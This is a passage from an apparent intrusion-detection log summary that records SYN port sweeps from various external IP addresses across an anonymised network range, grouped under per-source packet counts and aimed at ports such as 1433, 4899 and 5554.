xxx.yyy.1.1:10080 SYN ******S* Jul 10 08:05:17 68.78.100.246:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.253:3128 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:3127 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:1080 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:10080 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.254:3128 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:3127 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:1080 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:10080 SYN ******S* Jul 10 16:04:50 68.78.100.246:22002 -> xxx.yyy.255.255:3128 SYN ******S* 179287 Jul 10 23:48:22 195.120.208.35:1863 -> xxx.yyy.1.1:8000 SYN ******S* Jul 10 23:48:22 195.120.208.35:1864 -> xxx.yyy.1.2:8000 SYN ******S* Jul 10 23:48:22 195.120.208.35:1865 -> xxx.yyy.1.3:8000 SYN ******S* Jul 10 23:48:23 195.120.208.35:1866 -> xxx.yyy.1.4:8000 SYN ******S* Jul 10 23:48:23 195.120.208.35:1867 -> xxx.yyy.1.5:8000 SYN ******S* Jul 10 23:48:23 195.120.208.35:1869 -> xxx.yyy.1.7:8000 SYN ******S* Jul 10 23:48:23 195.120.208.35:1868 -> xxx.yyy.1.6:8000 SYN ******S* Jul 10 23:48:23 195.120.208.35:1870 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 10 23:55:36 195.120.208.35:2314 -> xxx.yyy.255.219:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2333 -> xxx.yyy.255.238:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2343 -> xxx.yyy.255.248:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2346 -> xxx.yyy.255.251:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2327 -> xxx.yyy.255.232:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2330 -> xxx.yyy.255.235:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2340 -> xxx.yyy.255.245:8000 SYN ******S* Jul 10 23:55:36 195.120.208.35:2324 -> xxx.yyy.255.229:8000 SYN ******S* 76000 Jul 10 19:06:52 216.55.183.14:3646 -> xxx.yyy.1.1:1433 SYN ******S* Jul 10 19:06:52 216.55.183.14:3658 -> xxx.yyy.1.2:1433 SYN ******S* Jul 10 19:06:52 216.55.183.14:3666 -> xxx.yyy.1.3:1433 SYN ******S* Jul 10 19:06:52 216.55.183.14:3678 -> xxx.yyy.1.4:1433 SYN ******S* Jul 10 19:06:55 216.55.183.14:3689 -> xxx.yyy.1.5:1433 SYN ******S* Jul 10 19:06:55 216.55.183.14:3698 -> xxx.yyy.1.6:1433 SYN ******S* Jul 10 19:06:55 216.55.183.14:3709 -> xxx.yyy.1.7:1433 SYN ******S* Jul 10 19:06:55 216.55.183.14:3719 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 10 19:22:14 216.55.183.14:1486 -> xxx.yyy.255.245:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1490 -> xxx.yyy.255.246:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1494 -> xxx.yyy.255.247:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1498 -> xxx.yyy.255.248:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1502 -> xxx.yyy.255.249:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1506 -> xxx.yyy.255.250:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1510 -> xxx.yyy.255.251:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1518 -> xxx.yyy.255.253:1433 SYN ******S* Jul 10 19:22:14 216.55.183.14:1522 -> xxx.yyy.255.254:1433 SYN ******S* 74612 Jul 10 17:47:35 200.32.3.102:3597 -> xxx.yyy.1.3:1433 SYN ******S* Jul 10 17:47:32 200.32.3.102:3596 -> xxx.yyy.1.2:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3598 -> xxx.yyy.1.4:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3601 -> xxx.yyy.1.7:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3599 -> xxx.yyy.1.5:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3602 -> xxx.yyy.1.8:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3600 -> xxx.yyy.1.6:1433 SYN ******S* Jul 10 17:47:35 200.32.3.102:3603 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jul 10 18:00:16 200.32.3.102:2045 -> xxx.yyy.255.202:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2044 -> xxx.yyy.255.201:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2042 -> xxx.yyy.255.199:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2043 -> xxx.yyy.255.200:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2041 -> xxx.yyy.255.198:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2046 -> xxx.yyy.255.203:1433 SYN ******S* Jul 10 18:00:16 200.32.3.102:2049 -> xxx.yyy.255.206:1433 SYN ******S* Jul 10 18:00:17 200.32.3.102:2051 -> xxx.yyy.255.208:1433 SYN ******S* 74308 Jul 10 23:27:33 212.28.150.243:2525 -> xxx.yyy.1.1:3632 SYN ******S* Jul 10 23:27:33 212.28.150.243:2526 -> xxx.yyy.1.2:3632 SYN ******S* Jul 10 23:27:33 212.28.150.243:2527 -> xxx.yyy.1.3:3632 SYN ******S* Jul 10 23:27:35 212.28.150.243:2528 -> xxx.yyy.1.4:3632 SYN ******S* Jul 10 23:27:35 212.28.150.243:2529 -> xxx.yyy.1.5:3632 SYN ******S* Jul 10 23:27:35 212.28.150.243:2530 -> xxx.yyy.1.6:3632 SYN ******S* Jul 10 23:27:35 212.28.150.243:2531 -> xxx.yyy.1.7:3632 SYN ******S* Jul 10 23:27:35 212.28.150.243:2532 -> xxx.yyy.1.8:3632 SYN ******S* [...] Jul 10 23:38:32 212.28.150.243:1405 -> xxx.yyy.255.251:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1402 -> xxx.yyy.255.248:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1399 -> xxx.yyy.255.245:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1406 -> xxx.yyy.255.252:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1403 -> xxx.yyy.255.249:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1407 -> xxx.yyy.255.253:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1404 -> xxx.yyy.255.250:3632 SYN ******S* Jul 10 23:38:32 212.28.150.243:1401 -> xxx.yyy.255.247:3632 SYN ******S* 73750 Jul 10 13:31:11 216.53.186.31:2158 -> xxx.yyy.1.1:34816 SYN ******S* Jul 10 13:31:11 216.53.186.31:2159 -> xxx.yyy.1.2:34816 SYN ******S* Jul 10 13:31:11 216.53.186.31:2160 -> xxx.yyy.1.3:34816 SYN ******S* Jul 10 13:31:13 216.53.186.31:2161 -> xxx.yyy.1.4:34816 SYN ******S* Jul 10 13:31:10 216.53.186.31:2162 -> xxx.yyy.1.5:34816 SYN ******S* Jul 10 13:31:13 216.53.186.31:2163 -> xxx.yyy.1.6:34816 SYN ******S* Jul 10 13:31:13 216.53.186.31:2164 -> xxx.yyy.1.7:34816 SYN ******S* Jul 10 13:31:13 216.53.186.31:2165 -> xxx.yyy.1.8:34816 SYN ******S* [...] Jul 10 13:42:05 216.53.186.31:1082 -> xxx.yyy.255.142:34816 SYN ******S* Jul 10 13:42:05 216.53.186.31:1085 -> xxx.yyy.255.145:34816 SYN ******S* Jul 10 13:42:05 216.53.186.31:1084 -> xxx.yyy.255.144:34816 SYN ******S* Jul 10 13:42:06 216.53.186.31:1087 -> xxx.yyy.255.147:34816 SYN ******S* Jul 10 13:42:06 216.53.186.31:1088 -> xxx.yyy.255.148:34816 SYN ******S* Jul 10 13:42:06 216.53.186.31:1089 -> xxx.yyy.255.149:34816 SYN ******S* Jul 10 13:42:06 216.53.186.31:1090 -> xxx.yyy.255.150:34816 SYN ******S* Jul 10 13:42:06 216.53.186.31:1091 -> xxx.yyy.255.151:34816 SYN ******S* 72601 Jul 10 22:54:26 221.149.141.41:1847 -> xxx.yyy.1.1:4899 SYN ******S* Jul 10 22:54:26 221.149.141.41:1849 -> xxx.yyy.1.3:4899 SYN ******S* Jul 10 22:54:26 221.149.141.41:1848 -> xxx.yyy.1.2:4899 SYN ******S* Jul 10 22:54:28 221.149.141.41:1850 -> xxx.yyy.1.4:4899 SYN ******S* Jul 10 22:54:28 221.149.141.41:1852 -> xxx.yyy.1.6:4899 SYN ******S* Jul 10 22:54:28 221.149.141.41:1851 -> xxx.yyy.1.5:4899 SYN ******S* Jul 10 22:54:28 221.149.141.41:1853 -> xxx.yyy.1.7:4899 SYN ******S* Jul 10 22:54:28 221.149.141.41:1854 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 10 23:06:07 221.149.141.41:4245 -> xxx.yyy.255.240:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4248 -> xxx.yyy.255.243:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4255 -> xxx.yyy.255.250:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4254 -> xxx.yyy.255.249:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4259 -> xxx.yyy.255.254:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4257 -> xxx.yyy.255.252:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4258 -> xxx.yyy.255.253:4899 SYN ******S* Jul 10 23:06:07 221.149.141.41:4256 -> xxx.yyy.255.251:4899 SYN ******S* 71495 Jul 10 18:25:07 213.84.51.53:3205 -> xxx.yyy.1.1:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3206 -> xxx.yyy.1.2:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3207 -> xxx.yyy.1.3:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3208 -> xxx.yyy.1.4:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3209 -> xxx.yyy.1.5:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3210 -> xxx.yyy.1.6:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3211 -> xxx.yyy.1.7:1433 SYN ******S* Jul 10 18:25:10 213.84.51.53:3212 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 10 18:36:50 213.84.51.53:4148 -> xxx.yyy.255.241:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4155 -> xxx.yyy.255.248:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4152 -> xxx.yyy.255.245:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4149 -> xxx.yyy.255.242:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4160 -> xxx.yyy.255.253:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4161 -> xxx.yyy.255.254:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4158 -> xxx.yyy.255.251:1433 SYN ******S* Jul 10 18:36:50 213.84.51.53:4159 -> xxx.yyy.255.252:1433 SYN ******S* 71035 Jul 10 13:32:11 67.82.97.226:47967 -> xxx.yyy.1.1:4000 SYN ******S* Jul 10 13:32:11 67.82.97.226:47969 -> xxx.yyy.1.3:4000 SYN ******S* Jul 10 13:32:13 67.82.97.226:47970 -> xxx.yyy.1.4:4000 SYN ******S* Jul 10 13:32:10 67.82.97.226:47971 -> xxx.yyy.1.5:4000 SYN ******S* Jul 10 13:32:13 67.82.97.226:47972 -> xxx.yyy.1.6:4000 SYN ******S* Jul 10 13:32:13 67.82.97.226:47973 -> xxx.yyy.1.7:4000 SYN ******S* Jul 10 13:32:13 67.82.97.226:47974 -> xxx.yyy.1.8:4000 SYN ******S* Jul 10 13:32:13 67.82.97.226:47975 -> xxx.yyy.1.9:4000 SYN ******S* [...] Jul 10 13:43:54 67.82.97.226:54537 -> xxx.yyy.255.239:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54543 -> xxx.yyy.255.245:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54540 -> xxx.yyy.255.242:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54548 -> xxx.yyy.255.250:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54552 -> xxx.yyy.255.254:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54549 -> xxx.yyy.255.251:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54550 -> xxx.yyy.255.252:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54546 -> xxx.yyy.255.248:4000 SYN ******S* Jul 10 13:43:54 67.82.97.226:54547 -> xxx.yyy.255.249:4000 SYN ******S* 70160 Jul 10 01:05:44 202.118.7.130:3459 -> xxx.yyy.1.1:20168 SYN ******S* Jul 10 01:05:44 202.118.7.130:3460 -> xxx.yyy.1.2:20168 SYN ******S* Jul 10 01:05:44 202.118.7.130:3461 -> xxx.yyy.1.3:20168 SYN ******S* Jul 10 01:05:45 202.118.7.130:3462 -> xxx.yyy.1.4:20168 SYN ******S* Jul 10 01:05:45 202.118.7.130:3463 -> xxx.yyy.1.5:20168 SYN ******S* Jul 10 01:05:45 202.118.7.130:3464 -> xxx.yyy.1.6:20168 SYN ******S* Jul 10 01:05:45 202.118.7.130:3465 -> xxx.yyy.1.7:20168 SYN ******S* Jul 10 01:05:45 202.118.7.130:3466 -> xxx.yyy.1.8:20168 SYN ******S* [...] Jul 10 01:17:26 202.118.7.130:2011 -> xxx.yyy.255.201:20168 SYN ******S* Jul 10 01:17:26 202.118.7.130:2008 -> xxx.yyy.255.198:20168 SYN ******S* Jul 10 01:17:26 202.118.7.130:2010 -> xxx.yyy.255.200:20168 SYN ******S* Jul 10 01:17:26 202.118.7.130:2012 -> xxx.yyy.255.202:20168 SYN ******S* Jul 10 01:17:26 202.118.7.130:2013 -> xxx.yyy.255.203:20168 SYN ******S* Jul 10 01:17:26 202.118.7.130:2014 -> xxx.yyy.255.204:20168 SYN ******S* Jul 10 01:17:27 202.118.7.130:2052 -> xxx.yyy.255.242:20168 SYN ******S* Jul 10 01:17:27 202.118.7.130:2054 -> xxx.yyy.255.244:20168 SYN ******S* 69954 Jul 10 02:30:45 82.192.225.192:1732 -> xxx.yyy.1.1:1257 SYN ******S* Jul 10 02:30:45 82.192.225.192:1734 -> xxx.yyy.1.2:1257 SYN ******S* Jul 10 02:30:45 82.192.225.192:1736 -> xxx.yyy.1.3:1257 SYN ******S* Jul 10 02:30:46 82.192.225.192:1738 -> xxx.yyy.1.4:1257 SYN ******S* Jul 10 02:30:46 82.192.225.192:1740 -> xxx.yyy.1.5:1257 SYN ******S* Jul 10 02:30:43 82.192.225.192:1742 -> xxx.yyy.1.6:1257 SYN ******S* Jul 10 02:30:43 82.192.225.192:1744 -> xxx.yyy.1.7:1257 SYN ******S* Jul 10 02:30:46 82.192.225.192:1748 -> xxx.yyy.1.9:1257 SYN ******S* [...] Jul 10 02:42:43 82.192.225.192:1478 -> xxx.yyy.255.245:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1479 -> xxx.yyy.255.246:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1482 -> xxx.yyy.255.247:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1483 -> xxx.yyy.255.248:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1490 -> xxx.yyy.255.251:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1491 -> xxx.yyy.255.252:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1494 -> xxx.yyy.255.253:1257 SYN ******S* Jul 10 02:42:43 82.192.225.192:1495 -> xxx.yyy.255.254:1257 SYN ******S* 52139 Jul 10 02:38:15 210.222.146.222:3534 -> xxx.yyy.1.1:4899 SYN ******S* Jul 10 02:38:15 210.222.146.222:3535 -> xxx.yyy.1.2:4899 SYN ******S* Jul 10 02:38:15 210.222.146.222:3536 -> xxx.yyy.1.3:4899 SYN ******S* Jul 10 02:38:14 210.222.146.222:3539 -> xxx.yyy.1.6:4899 SYN ******S* Jul 10 02:38:14 210.222.146.222:3537 -> xxx.yyy.1.4:4899 SYN ******S* Jul 10 02:38:14 210.222.146.222:3538 -> xxx.yyy.1.5:4899 SYN ******S* Jul 10 02:38:14 210.222.146.222:3541 -> xxx.yyy.1.8:4899 SYN ******S* Jul 10 02:38:14 210.222.146.222:3540 -> xxx.yyy.1.7:4899 SYN ******S* [...] Jul 10 02:43:48 210.222.146.222:4868 -> xxx.yyy.254.62:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:4847 -> xxx.yyy.254.56:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:4876 -> xxx.yyy.254.65:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:4877 -> xxx.yyy.254.66:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:1062 -> xxx.yyy.254.101:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:1061 -> xxx.yyy.254.100:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:1063 -> xxx.yyy.254.102:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:1060 -> xxx.yyy.254.99:4899 SYN ******S* Jul 10 02:43:48 210.222.146.222:1064 -> xxx.yyy.254.103:4899 SYN ******S* 44888 Jul 10 02:21:07 24.80.86.102:2502 -> xxx.yyy.1.1:4899 SYN ******S* Jul 10 02:21:07 24.80.86.102:2503 -> xxx.yyy.1.2:4899 SYN ******S* Jul 10 02:21:07 24.80.86.102:2504 -> xxx.yyy.1.3:4899 SYN ******S* Jul 10 02:21:05 24.80.86.102:2505 -> xxx.yyy.1.4:4899 SYN ******S* Jul 10 02:21:05 24.80.86.102:2507 -> xxx.yyy.1.5:4899 SYN ******S* Jul 10 02:21:05 24.80.86.102:2508 -> xxx.yyy.1.6:4899 SYN ******S* Jul 10 02:21:05 24.80.86.102:2509 -> xxx.yyy.1.7:4899 SYN ******S* Jul 10 02:21:05 24.80.86.102:2510 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 10 02:25:58 24.80.86.102:1816 -> xxx.yyy.255.247:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1817 -> xxx.yyy.255.248:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1818 -> xxx.yyy.255.249:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1819 -> xxx.yyy.255.250:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1820 -> xxx.yyy.255.251:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1823 -> xxx.yyy.255.252:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1824 -> xxx.yyy.255.253:4899 SYN ******S* Jul 10 02:25:58 24.80.86.102:1825 -> xxx.yyy.255.254:4899 SYN ******S* 44885 Jul 10 19:02:32 130.13.90.154:3465 -> xxx.yyy.1.1:4899 SYN ******S* Jul 10 19:02:32 130.13.90.154:3471 -> xxx.yyy.1.2:4899 SYN ******S* Jul 10 19:02:32 130.13.90.154:3472 -> xxx.yyy.1.3:4899 SYN ******S* Jul 10 19:02:31 130.13.90.154:3473 -> xxx.yyy.1.4:4899 SYN ******S* Jul 10 19:02:31 130.13.90.154:3474 -> xxx.yyy.1.5:4899 SYN ******S* Jul 10 19:02:31 130.13.90.154:3475 -> xxx.yyy.1.6:4899 SYN ******S* Jul 10 19:02:31 130.13.90.154:3476 -> xxx.yyy.1.7:4899 SYN ******S* Jul 10 19:02:31 130.13.90.154:3477 -> xxx.yyy.1.8:4899 SYN ******S* [...] Jul 10 19:08:20 130.13.90.154:4444 -> xxx.yyy.255.246:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4446 -> xxx.yyy.255.247:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4447 -> xxx.yyy.255.248:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4448 -> xxx.yyy.255.249:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4451 -> xxx.yyy.255.250:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4455 -> xxx.yyy.255.251:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4457 -> xxx.yyy.255.252:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4458 -> xxx.yyy.255.253:4899 SYN ******S* Jul 10 19:08:20 130.13.90.154:4459 -> xxx.yyy.255.254:4899 SYN ******S* 44528 Jul 10 21:08:23 61.229.226.91:3627 -> xxx.yyy.1.1:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3628 -> xxx.yyy.1.2:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3629 -> xxx.yyy.1.3:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3631 -> xxx.yyy.1.4:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3632 -> xxx.yyy.1.5:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3635 -> xxx.yyy.1.6:1433 SYN ******S* Jul 10 21:08:23 61.229.226.91:3637 -> xxx.yyy.1.7:1433 SYN ******S* Jul 10 21:08:20 61.229.226.91:3638 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 10 21:53:59 61.229.226.91:4977 -> xxx.yyy.255.45:1433 SYN ******S* Jul 10 21:53:59 61.229.226.91:4001 -> xxx.yyy.255.47:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:3851 -> xxx.yyy.255.164:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:4902 -> xxx.yyy.255.173:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:4922 -> xxx.yyy.255.188:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:4521 -> xxx.yyy.255.202:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:4108 -> xxx.yyy.255.204:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:4951 -> xxx.yyy.255.235:1433 SYN ******S* Jul 10 21:54:01 61.229.226.91:3076 -> xxx.yyy.255.236:1433 SYN ******S* 40624 Jul 10 01:39:03 211.218.38.226:2919 -> xxx.yyy.1.1:4899 SYN ******S* Jul 10 01:39:01 211.218.38.226:2922 -> xxx.yyy.1.4:4899 SYN ******S* Jul 10 01:39:01 211.218.38.226:2924 -> xxx.yyy.1.6:4899 SYN ******S* Jul 10 01:39:03 211.218.38.226:2920 -> xxx.yyy.1.2:4899 SYN ******S* Jul 10 01:39:01 211.218.38.226:2925 -> xxx.yyy.1.7:4899 SYN ******S* Jul 10 01:39:01 211.218.38.226:2926 -> xxx.yyy.1.8:4899 SYN ******S* Jul 10 01:39:03 211.218.38.226:2921 -> xxx.yyy.1.3:4899 SYN ******S* Jul 10 01:39:01 211.218.38.226:2931 -> xxx.yyy.1.13:4899 SYN ******S* [...] Jul 10 01:44:00 211.218.38.226:2532 -> xxx.yyy.170.67:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2533 -> xxx.yyy.170.68:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2526 -> xxx.yyy.170.61:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2530 -> xxx.yyy.170.65:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2537 -> xxx.yyy.170.72:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2531 -> xxx.yyy.170.66:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2534 -> xxx.yyy.170.69:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2535 -> xxx.yyy.170.70:4899 SYN ******S* Jul 10 01:44:00 211.218.38.226:2536 -> xxx.yyy.170.71:4899 SYN ******S* 23268 Jul 10 23:56:30 211.50.6.65:2388 -> xxx.yyy.133.234:5554 SYN ******S* Jul 10 23:56:31 211.50.6.65:3002 -> xxx.yyy.133.234:1023 SYN ******S* Jul 10 23:56:33 211.50.6.65:4282 -> xxx.yyy.133.234:9898 SYN ******S* Jul 10 23:56:30 211.50.6.65:2386 -> xxx.yyy.133.235:5554 SYN ******S* Jul 10 23:56:31 211.50.6.65:3000 -> xxx.yyy.133.235:1023 SYN ******S* Jul 10 23:56:33 211.50.6.65:4279 -> xxx.yyy.133.235:9898 SYN ******S* Jul 10 23:56:30 211.50.6.65:2398 -> xxx.yyy.133.236:5554 SYN ******S* Jul 10 23:56:31 211.50.6.65:3034 -> xxx.yyy.133.236:1023 SYN ******S* [...] Jul 10 23:57:11 211.50.6.65:1648 -> xxx.yyy.153.134:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1652 -> xxx.yyy.153.135:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1662 -> xxx.yyy.153.137:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1742 -> xxx.yyy.153.139:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1741 -> xxx.yyy.153.138:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1744 -> xxx.yyy.153.140:9898 SYN ******S* Jul 10 23:57:11 211.50.6.65:1754 -> xxx.yyy.153.141:9898 SYN ******S* Jul 10 23:57:12 211.50.6.65:1866 -> xxx.yyy.153.144:9898 SYN ******S* Jul 10 23:57:12 211.50.6.65:1915 -> xxx.yyy.153.146:9898 SYN ******S* 14850 Jul 10 23:56:03 220.121.22.125:1936 -> xxx.yyy.235.113:5554 SYN ******S* Jul 10 23:56:04 220.121.22.125:2502 -> xxx.yyy.235.113:1023 SYN ******S* Jul 10 23:56:06 220.121.22.125:3870 -> xxx.yyy.235.113:9898 SYN ******S* Jul 10 23:56:03 220.121.22.125:1945 -> xxx.yyy.235.121:5554 SYN ******S* Jul 10 23:56:04 220.121.22.125:2507 -> xxx.yyy.235.121:1023 SYN ******S* Jul 10 23:56:06 220.121.22.125:3875 -> xxx.yyy.235.121:9898 SYN ******S* Jul 10 23:56:03 220.121.22.125:1941 -> xxx.yyy.235.118:5554 SYN ******S* Jul 10 23:56:04 220.121.22.125:2505 -> xxx.yyy.235.118:1023 SYN ******S* [...] Jul 10 23:56:48 220.121.22.125:3765 -> xxx.yyy.255.72:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3742 -> xxx.yyy.255.49:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3747 -> xxx.yyy.255.54:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3755 -> xxx.yyy.255.62:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3760 -> xxx.yyy.255.67:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3762 -> xxx.yyy.255.69:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3761 -> xxx.yyy.255.68:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3758 -> xxx.yyy.255.65:9898 SYN ******S* Jul 10 23:56:48 220.121.22.125:3763 -> xxx.yyy.255.70:9898 SYN ******S* 14829 Jul 10 00:55:59 61.51.159.107:1121 -> xxx.yyy.215.210:5554 SYN ******S* Jul 10 00:56:00 61.51.159.107:1601 -> xxx.yyy.215.210:1023 SYN ******S* Jul 10 00:56:02 61.51.159.107:2623 -> xxx.yyy.215.210:9898 SYN ******S* Jul 10 00:55:59 61.51.159.107:1122 -> xxx.yyy.215.211:5554 SYN ******S* Jul 10 00:56:00 61.51.159.107:1606 -> xxx.yyy.215.211:1023 SYN ******S* Jul 10 00:56:02 61.51.159.107:2629 -> xxx.yyy.215.211:9898 SYN ******S* Jul 10 00:55:59 61.51.159.107:1123 -> xxx.yyy.215.216:5554 SYN ******S* Jul 10 00:56:00 61.51.159.107:1604 -> xxx.yyy.215.216:1023 SYN ******S* [...] Jul 10 00:56:43 61.51.159.107:2444 -> xxx.yyy.236.74:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2449 -> xxx.yyy.236.75:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2452 -> xxx.yyy.236.76:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2557 -> xxx.yyy.215.215:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2561 -> xxx.yyy.215.220:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2560 -> xxx.yyy.215.213:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2558 -> xxx.yyy.215.217:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2563 -> xxx.yyy.215.218:9898 SYN ******S* Jul 10 00:56:43 61.51.159.107:2564 -> xxx.yyy.215.219:9898 SYN ******S* 12800 Jul 10 00:57:08 61.149.115.82:1796 -> xxx.yyy.154.100:5554 SYN ******S* Jul 10 00:57:09 61.149.115.82:2282 -> xxx.yyy.154.100:1023 SYN ******S* Jul 10 00:57:08 61.149.115.82:1807 -> xxx.yyy.154.102:5554 SYN ******S* Jul 10 00:57:09 61.149.115.82:2291 -> xxx.yyy.154.102:1023 SYN ******S* Jul 10 00:57:08 61.149.115.82:1813 -> xxx.yyy.154.104:5554 SYN ******S* Jul 10 00:57:09 61.149.115.82:2297 -> xxx.yyy.154.104:1023 SYN ******S* Jul 10 00:57:08 61.149.115.82:1810 -> xxx.yyy.154.103:5554 SYN ******S* Jul 10 00:57:08 61.149.115.82:1852 -> xxx.yyy.154.108:5554 SYN ******S* [...] Jul 10 00:57:58 61.149.115.82:3340 -> 